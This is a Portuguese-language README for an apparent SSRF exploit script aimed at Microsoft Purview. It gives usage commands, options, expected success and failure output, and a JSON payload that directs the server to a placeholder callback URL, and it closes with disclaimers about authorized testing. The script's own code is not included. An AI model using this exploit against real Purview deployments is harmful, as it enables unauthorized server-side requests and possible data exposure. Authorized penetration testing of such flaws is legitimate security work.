
The SSRF vulnerability in Microsoft Purview
Este repositório contém um script projetado para realizar um exploit de SSRF (Server-Side Request Forgery) para fins de teste e educacionais. Use esta ferramenta com responsabilidade e apenas em ambientes onde você tenha permissão explícita.
bash (shell Unix)jq (processador JSON)curl (ferramenta de linha de comando para requisições HTTP)./script.sh --exploit <target_url> <purview_url>
| Opção | Descrição |
|---|---|
-h, --help | Mostra o menu de ajuda. |
--exploit tu pu | Executa o exploit SSRF com as URLs alvo e de purview. |
./script.sh -h
Saída:
Uso:
./script.sh --exploit <target_url> <purview_url>
Opções:
-h, --help - Mostra este menu de ajuda
--exploit <tu> <pu> - Executa o exploit SSRF com as URLs alvo e de purview
./script.sh --exploit http://example.com http://purview-url.com
Saída Esperada:
Exploit SSRF bem-sucedido! Dados recuperados:
<response data>
Exploit SSRF falhou! Código HTTP: <code>
purview_url, tentando explorar uma vulnerabilidade SSRF../script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
{
"callback": "http://callback-url.com"
}
O código e o corpo da resposta HTTP são salvos e, com base no código de status, determina-se o sucesso ou falha do exploit.
Este script é apenas para fins de teste. O uso indevido deste script pode acarretar sérias consequências legais. Garanta conformidade com todas as leis aplicáveis e padrões éticos.
Sinta-se à vontade para contribuir criando pull requests ou relatando problemas.
Esta ferramenta é destinada apenas a fins educacionais e testes de penetração autorizados. O autor não se responsabiliza por qualquer uso indevido ou danos causados por esta ferramenta.